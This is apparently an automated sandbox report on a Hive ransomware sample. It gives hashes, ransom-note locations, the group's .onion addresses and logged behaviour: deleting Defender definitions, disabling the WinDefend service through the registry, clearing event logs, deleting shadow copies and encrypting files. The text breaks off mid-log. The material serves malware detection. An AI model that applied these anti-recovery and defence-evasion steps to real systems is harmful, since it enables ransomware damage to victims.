Analysis
-
max time kernel
111s -
max time network
19s -
platform
windows7_x64 -
resource
win7-en-20211208 -
submitted
12-01-2022 16:51
Static task
static1
Behavioral task
behavioral1
Sample
ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe
Resource
win7-en-20211208
Behavioral task
behavioral2
Sample
ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe
Resource
win10-en-20211208
General
-
Target
ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe
-
Size
2.6MB
-
MD5
ca7878f1271bb808e628f7ebb84bcc1f
-
SHA1
8f7713d0519be5c75453b3028ff7baa564fe84c1
-
SHA256
ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216
-
SHA512
58bf1728467eb32d94be1be4e70d3ca97e0eb21d9fd375d5e567a908ce4a5a2473e4e6e0ebecb57152a4fb6eec137d1a3e843a45cd0eabc1d55f704e42c3a3f4
Malware Config
Extracted
C:\Program Files\7-Zip\vyS2_HOW_TO_DECRYPT.txt
hive
http://hiveleakdbtnp76ulyhi52eag6c6tyc3xw7ez7iqy6wc34gd2nekazyd.onion/
http://hivecust6vhekztbqgdnkks64ucehqacge3dij3gyrrpdp57zoq3ooqd.onion/
Signatures
-
Deletes Windows Defender Definitions 2 TTPs 1 IoCs
Uses mpcmdrun utility to delete all AV definitions.
Processes:
MpCmdRun.exepid process 1064 MpCmdRun.exe -
Hive
A ransomware written in Golang first seen in June 2021.
-
Modifies security service 2 TTPs 1 IoCs
Processes:
reg.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WinDefend\Start = "4" reg.exe -
Clears Windows event logs 1 TTPs
-
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
Processes:
bcdedit.exebcdedit.exepid process 660 bcdedit.exe 1468 bcdedit.exe -
Modifies extensions of user files 2 IoCs
Ransomware generally changes the extension on encrypted files.
Processes:
ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exedescription ioc process File renamed C:\Users\Admin\Pictures\RepairEdit.tif => C:\Users\Admin\Pictures\RepairEdit.tif.ozcQ5SmGnOwN1Mo5fQ25V59C_wCrqXWgl9Kwm8uR3dX_EhNcjUAuLdM0.8zvpm ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe File opened for modification C:\Users\Admin\Pictures\RepairEdit.tif.ozcQ5SmGnOwN1Mo5fQ25V59C_wCrqXWgl9Kwm8uR3dX_EhNcjUAuLdM0.8zvpm ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Drops file in Program Files directory 64 IoCs
Processes:
ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exedescription ioc process File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\dialogs\create_stream.html.ozcQ5SmGnOwN1Mo5fQ25V59C_wCrqXWgl9Kwm8uR3dX_2K-A8LTlW3c0.8zvpm ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe File opened for modification C:\Program Files (x86)\Common Files\microsoft shared\THEMES14\COMPASS\COMPASS.ELM.ozcQ5SmGnOwN1Mo5fQ25V59C_wCrqXWgl9Kwm8uR3dX_HxyKwaAO0kA0.8zvpm ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02062U.BMP.ozcQ5SmGnOwN1Mo5fQ25V59C_wCrqXWgl9Kwm8uR3dX_8Q6E0oc6aSk0.8zvpm ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\GROOVE_K_COL.HXK.ozcQ5SmGnOwN1Mo5fQ25V59C_wCrqXWgl9Kwm8uR3dX_3yv4CdwDjBk0.8zvpm ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\DGACCBAR.XML.ozcQ5SmGnOwN1Mo5fQ25V59C_wCrqXWgl9Kwm8uR3dX_1d5LHCbnaoQ0.8zvpm ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Push\NavigationLeft_ButtonGraphic.png ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\management\snmp.acl.template.ozcQ5SmGnOwN1Mo5fQ25V59C_wCrqXWgl9Kwm8uR3dX_5pwCAk2ZeU40.8zvpm ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\update_tracking\com-sun-tools-visualvm-host.xml.ozcQ5SmGnOwN1Mo5fQ25V59C_wCrqXWgl9Kwm8uR3dX_TDi2M248ae40.8zvpm ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\VDKHome\VDK10.STD.ozcQ5SmGnOwN1Mo5fQ25V59C_wCrqXWgl9Kwm8uR3dX_mB197x-7ESg0.8zvpm ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0105398.WMF.ozcQ5SmGnOwN1Mo5fQ25V59C_wCrqXWgl9Kwm8uR3dX_iqTGUFcF8K40.8zvpm ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\Publisher\Backgrounds\WB02055_.GIF.ozcQ5SmGnOwN1Mo5fQ25V59C_wCrqXWgl9Kwm8uR3dX_QrECq0XitvE0.8zvpm ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\attention.gif.ozcQ5SmGnOwN1Mo5fQ25V59C_wCrqXWgl9Kwm8uR3dX_UaFo7RFhTW80.8zvpm ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe File opened for modification C:\Program Files\7-Zip\Lang\id.txt.ozcQ5SmGnOwN1Mo5fQ25V59C_wCrqXWgl9Kwm8uR3dX_7nt2z_fC8G80.8zvpm ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Beirut.ozcQ5SmGnOwN1Mo5fQ25V59C_wCrqXWgl9Kwm8uR3dX_OIDYItiR9UA0.8zvpm ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe File opened for modification C:\Program Files\Windows Media Player\Network Sharing\wmpnss_color120.png ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe File opened for modification C:\Program Files\Windows Media Player\en-US\WMPMediaSharing.dll.mui ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe File opened for modification C:\Program Files (x86)\Common Files\System\msadc\de-DE\msdaremr.dll.mui ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe File opened for modification C:\Program Files (x86)\Common Files\microsoft shared\TRANSLAT\FREN\WT61FR.LEX.ozcQ5SmGnOwN1Mo5fQ25V59C_wCrqXWgl9Kwm8uR3dX_-A5L_yyGy9w0.8zvpm ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\LINES\BD21320_.GIF.ozcQ5SmGnOwN1Mo5fQ25V59C_wCrqXWgl9Kwm8uR3dX_73Xpwn8vOXU0.8zvpm ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe File opened for modification C:\Program Files\Common Files\System\Ole DB\fr-FR\oledb32r.dll.mui ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.babel.nls_eclipse_zh_4.4.0.v20140623020002\about.html.ozcQ5SmGnOwN1Mo5fQ25V59C_wCrqXWgl9Kwm8uR3dX_sXWSuGNPlOw0.8zvpm ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\bg_TexturedBlue.gif.ozcQ5SmGnOwN1Mo5fQ25V59C_wCrqXWgl9Kwm8uR3dX_o0gZWWqnMpE0.8zvpm ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\olh.htm.ozcQ5SmGnOwN1Mo5fQ25V59C_wCrqXWgl9Kwm8uR3dX_ZAYgjyLklNI0.8zvpm ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.swt.nl_ja_4.4.0.v20140623020002.jar.ozcQ5SmGnOwN1Mo5fQ25V59C_wCrqXWgl9Kwm8uR3dX_2iBLvPrc1cs0.8zvpm ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\BL00525_.WMF.ozcQ5SmGnOwN1Mo5fQ25V59C_wCrqXWgl9Kwm8uR3dX_QmX4s34Pm_w0.8zvpm ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Effects\Apex.eftx.ozcQ5SmGnOwN1Mo5fQ25V59C_wCrqXWgl9Kwm8uR3dX_J92562rVLaA0.8zvpm ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\LightSpirit.css.ozcQ5SmGnOwN1Mo5fQ25V59C_wCrqXWgl9Kwm8uR3dX_IvKtXVYpzBU0.8zvpm ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME32.CSS.ozcQ5SmGnOwN1Mo5fQ25V59C_wCrqXWgl9Kwm8uR3dX__Juo41fnAak0.8zvpm ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\PUBSPAPR\PDIR35B.GIF.ozcQ5SmGnOwN1Mo5fQ25V59C_wCrqXWgl9Kwm8uR3dX_He5v3L7Le2Y0.8zvpm ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\javafx-doclet.jar.ozcQ5SmGnOwN1Mo5fQ25V59C_wCrqXWgl9Kwm8uR3dX_6mmSMYFtRpg0.8zvpm ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-core_zh_CN.jar.ozcQ5SmGnOwN1Mo5fQ25V59C_wCrqXWgl9Kwm8uR3dX_kRcKiFTFKdY0.8zvpm ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe File opened for modification C:\Program Files (x86)\Common Files\microsoft shared\VSTA\8.0\Microsoft.VisualStudio.Tools.Applications.Blueprints.tlb.ozcQ5SmGnOwN1Mo5fQ25V59C_wCrqXWgl9Kwm8uR3dX_cxO5c_vZWKQ0.8zvpm ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\ED00172_.WMF.ozcQ5SmGnOwN1Mo5fQ25V59C_wCrqXWgl9Kwm8uR3dX_KMKEoirQ7Kk0.8zvpm ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Metro.xml.ozcQ5SmGnOwN1Mo5fQ25V59C_wCrqXWgl9Kwm8uR3dX_FCW9pEv76SY0.8zvpm ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\CONVERT\DELIMDOS.FAE.ozcQ5SmGnOwN1Mo5fQ25V59C_wCrqXWgl9Kwm8uR3dX_yMZghGXwK0M0.8zvpm ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\OldAge\vintage.png ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe File opened for modification C:\Program Files\Windows Sidebar\de-DE\Sidebar.exe.mui ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\open_original_form.gif.ozcQ5SmGnOwN1Mo5fQ25V59C_wCrqXWgl9Kwm8uR3dX_nzaHGLv0l7g0.8zvpm ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\SlideShow.Gadget\de-DE\gadget.xml ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe File opened for modification C:\Program Files\Windows Sidebar\Gadgets\MediaCenter.Gadget\css\settings.css ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe File opened for modification C:\Program Files\Windows Sidebar\Gadgets\RSSFeeds.Gadget\ja-JP\css\RSSFeeds.css ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe File opened for modification C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\17.png ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0152694.WMF.ozcQ5SmGnOwN1Mo5fQ25V59C_wCrqXWgl9Kwm8uR3dX_6y_JmgaBjcc0.8zvpm ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Horizon.xml.ozcQ5SmGnOwN1Mo5fQ25V59C_wCrqXWgl9Kwm8uR3dX_ohINEspscuA0.8zvpm ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\ENV98SP.POC.ozcQ5SmGnOwN1Mo5fQ25V59C_wCrqXWgl9Kwm8uR3dX_xVSL3MKDwio0.8zvpm ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe File created C:\Program Files\Java\jre7\lib\zi\Australia\vyS2_HOW_TO_DECRYPT.txt ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-modules-keyring-impl.jar.ozcQ5SmGnOwN1Mo5fQ25V59C_wCrqXWgl9Kwm8uR3dX_T_5kpoyHQ4o0.8zvpm ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe File opened for modification C:\Program Files\Windows Media Player\Media Renderer\DMR_120.jpg ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe File opened for modification C:\Program Files\Windows Photo Viewer\es-ES\PhotoViewer.dll.mui ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0107138.WMF.ozcQ5SmGnOwN1Mo5fQ25V59C_wCrqXWgl9Kwm8uR3dX_LXf1aZUo83k0.8zvpm ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD10298_.GIF.ozcQ5SmGnOwN1Mo5fQ25V59C_wCrqXWgl9Kwm8uR3dX_IUEzNwTFoFo0.8zvpm ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\CONTACTINFOBB.POC.ozcQ5SmGnOwN1Mo5fQ25V59C_wCrqXWgl9Kwm8uR3dX_GXJ8f_850rQ0.8zvpm ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\RES98.POC.ozcQ5SmGnOwN1Mo5fQ25V59C_wCrqXWgl9Kwm8uR3dX_gZ_OULBOO1Q0.8zvpm ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-core-multitabs.xml.ozcQ5SmGnOwN1Mo5fQ25V59C_wCrqXWgl9Kwm8uR3dX_sbwHUebQ9pc0.8zvpm ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Legal\ENU\license.html ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms5\FormsColorChart.html.ozcQ5SmGnOwN1Mo5fQ25V59C_wCrqXWgl9Kwm8uR3dX_Ioa59tnyF6g0.8zvpm ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.rcp_4.3.100.v20141007-2301.jar.ozcQ5SmGnOwN1Mo5fQ25V59C_wCrqXWgl9Kwm8uR3dX_uwITgXmPWSI0.8zvpm ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0103850.WMF.ozcQ5SmGnOwN1Mo5fQ25V59C_wCrqXWgl9Kwm8uR3dX_Tng6RQylyO40.8zvpm ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0106146.WMF.ozcQ5SmGnOwN1Mo5fQ25V59C_wCrqXWgl9Kwm8uR3dX_8jBlI_xLw680.8zvpm ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0107342.WMF.ozcQ5SmGnOwN1Mo5fQ25V59C_wCrqXWgl9Kwm8uR3dX_wU-hOPd_Trc0.8zvpm ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\rtf_pressed.gif.ozcQ5SmGnOwN1Mo5fQ25V59C_wCrqXWgl9Kwm8uR3dX_Jv4qWcwwWMA0.8zvpm ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe File opened for modification C:\Program Files (x86)\Windows Media Player\de-DE\wmplayer.exe.mui ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Effects\Equity.eftx.ozcQ5SmGnOwN1Mo5fQ25V59C_wCrqXWgl9Kwm8uR3dX_dLxdhNykO340.8zvpm ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe File opened for modification C:\Program Files\Internet Explorer\ie9props.propdesc ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe -
Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
-
Interacts with shadow copies 2 TTPs 1 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
Processes:
vssadmin.exepid process 1324 vssadmin.exe -
Opens file in notepad (likely ransom note) 1 IoCs
Processes:
notepad.exepid process 2336 notepad.exe -
Runs net.exe
-
Runs ping.exe 1 TTPs 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 3 IoCs
Processes:
powershell.exepowershell.execcbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exepid process 1156 powershell.exe 1064 powershell.exe 1400 ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
wevtutil.exewevtutil.exewevtutil.exewmic.exewmic.exedescription pid process Token: SeSecurityPrivilege 1708 wevtutil.exe Token: SeBackupPrivilege 1708 wevtutil.exe Token: SeSecurityPrivilege 884 wevtutil.exe Token: SeBackupPrivilege 884 wevtutil.exe Token: SeSecurityPrivilege 1612 wevtutil.exe Token: SeBackupPrivilege 1612 wevtutil.exe Token: SeIncreaseQuotaPrivilege 1476 wmic.exe Token: SeSecurityPrivilege 1476 wmic.exe Token: SeTakeOwnershipPrivilege 1476 wmic.exe Token: SeLoadDriverPrivilege 1476 wmic.exe Token: SeSystemProfilePrivilege 1476 wmic.exe Token: SeSystemtimePrivilege 1476 wmic.exe Token: SeProfSingleProcessPrivilege 1476 wmic.exe Token: SeIncBasePriorityPrivilege 1476 wmic.exe Token: SeCreatePagefilePrivilege 1476 wmic.exe Token: SeBackupPrivilege 1476 wmic.exe Token: SeRestorePrivilege 1476 wmic.exe Token: SeShutdownPrivilege 1476 wmic.exe Token: SeDebugPrivilege 1476 wmic.exe Token: SeSystemEnvironmentPrivilege 1476 wmic.exe Token: SeRemoteShutdownPrivilege 1476 wmic.exe Token: SeUndockPrivilege 1476 wmic.exe Token: SeManageVolumePrivilege 1476 wmic.exe Token: 33 1476 wmic.exe Token: 34 1476 wmic.exe Token: 35 1476 wmic.exe Token: SeIncreaseQuotaPrivilege 972 wmic.exe Token: SeSecurityPrivilege 972 wmic.exe Token: SeTakeOwnershipPrivilege 972 wmic.exe Token: SeLoadDriverPrivilege 972 wmic.exe Token: SeSystemProfilePrivilege 972 wmic.exe Token: SeSystemtimePrivilege 972 wmic.exe Token: SeProfSingleProcessPrivilege 972 wmic.exe Token: SeIncBasePriorityPrivilege 972 wmic.exe Token: SeCreatePagefilePrivilege 972 wmic.exe Token: SeBackupPrivilege 972 wmic.exe Token: SeRestorePrivilege 972 wmic.exe Token: SeShutdownPrivilege 972 wmic.exe Token: SeDebugPrivilege 972 wmic.exe Token: SeSystemEnvironmentPrivilege 972 wmic.exe Token: SeRemoteShutdownPrivilege 972 wmic.exe Token: SeUndockPrivilege 972 wmic.exe Token: SeManageVolumePrivilege 972 wmic.exe Token: 33 972 wmic.exe Token: 34 972 wmic.exe Token: 35 972 wmic.exe Token: SeIncreaseQuotaPrivilege 972 wmic.exe Token: SeSecurityPrivilege 972 wmic.exe Token: SeTakeOwnershipPrivilege 972 wmic.exe Token: SeLoadDriverPrivilege 972 wmic.exe Token: SeSystemProfilePrivilege 972 wmic.exe Token: SeSystemtimePrivilege 972 wmic.exe Token: SeProfSingleProcessPrivilege 972 wmic.exe Token: SeIncBasePriorityPrivilege 972 wmic.exe Token: SeCreatePagefilePrivilege 972 wmic.exe Token: SeBackupPrivilege 972 wmic.exe Token: SeRestorePrivilege 972 wmic.exe Token: SeShutdownPrivilege 972 wmic.exe Token: SeDebugPrivilege 972 wmic.exe Token: SeSystemEnvironmentPrivilege 972 wmic.exe Token: SeRemoteShutdownPrivilege 972 wmic.exe Token: SeUndockPrivilege 972 wmic.exe Token: SeManageVolumePrivilege 972 wmic.exe Token: 33 972 wmic.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exenet.exenet.exenet.exenet.exenet.exenet.exenet.exenet.exedescription pid process target process PID 1400 wrote to memory of 2036 1400 ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe net.exe PID 1400 wrote to memory of 2036 1400 ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe net.exe PID 1400 wrote to memory of 2036 1400 ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe net.exe PID 2036 wrote to memory of 1160 2036 net.exe net1.exe PID 2036 wrote to memory of 1160 2036 net.exe net1.exe PID 2036 wrote to memory of 1160 2036 net.exe net1.exe PID 1400 wrote to memory of 696 1400 ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe net.exe PID 1400 wrote to memory of 696 1400 ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe net.exe PID 1400 wrote to memory of 696 1400 ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe net.exe PID 696 wrote to memory of 1224 696 net.exe net1.exe PID 696 wrote to memory of 1224 696 net.exe net1.exe PID 696 wrote to memory of 1224 696 net.exe net1.exe PID 1400 wrote to memory of 1252 1400 ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe net.exe PID 1400 wrote to memory of 1252 1400 ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe net.exe PID 1400 wrote to memory of 1252 1400 ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe net.exe PID 1252 wrote to memory of 764 1252 net.exe net1.exe PID 1252 wrote to memory of 764 1252 net.exe net1.exe PID 1252 wrote to memory of 764 1252 net.exe net1.exe PID 1400 wrote to memory of 816 1400 ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe net.exe PID 1400 wrote to memory of 816 1400 ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe net.exe PID 1400 wrote to memory of 816 1400 ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe net.exe PID 816 wrote to memory of 1544 816 net.exe net1.exe PID 816 wrote to memory of 1544 816 net.exe net1.exe PID 816 wrote to memory of 1544 816 net.exe net1.exe PID 1400 wrote to memory of 1952 1400 ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe net.exe PID 1400 wrote to memory of 1952 1400 ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe net.exe PID 1400 wrote to memory of 1952 1400 ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe net.exe PID 1952 wrote to memory of 740 1952 net.exe net1.exe PID 1952 wrote to memory of 740 1952 net.exe net1.exe PID 1952 wrote to memory of 740 1952 net.exe net1.exe PID 1400 wrote to memory of 956 1400 ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe net.exe PID 1400 wrote to memory of 956 1400 ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe net.exe PID 1400 wrote to memory of 956 1400 ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe net.exe PID 956 wrote to memory of 960 956 net.exe net1.exe PID 956 wrote to memory of 960 956 net.exe net1.exe PID 956 wrote to memory of 960 956 net.exe net1.exe PID 1400 wrote to memory of 1404 1400 ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe net.exe PID 1400 wrote to memory of 1404 1400 ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe net.exe PID 1400 wrote to memory of 1404 1400 ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe net.exe PID 1404 wrote to memory of 1560 1404 net.exe net1.exe PID 1404 wrote to memory of 1560 1404 net.exe net1.exe PID 1404 wrote to memory of 1560 1404 net.exe net1.exe PID 1400 wrote to memory of 1804 1400 ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe net.exe PID 1400 wrote to memory of 1804 1400 ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe 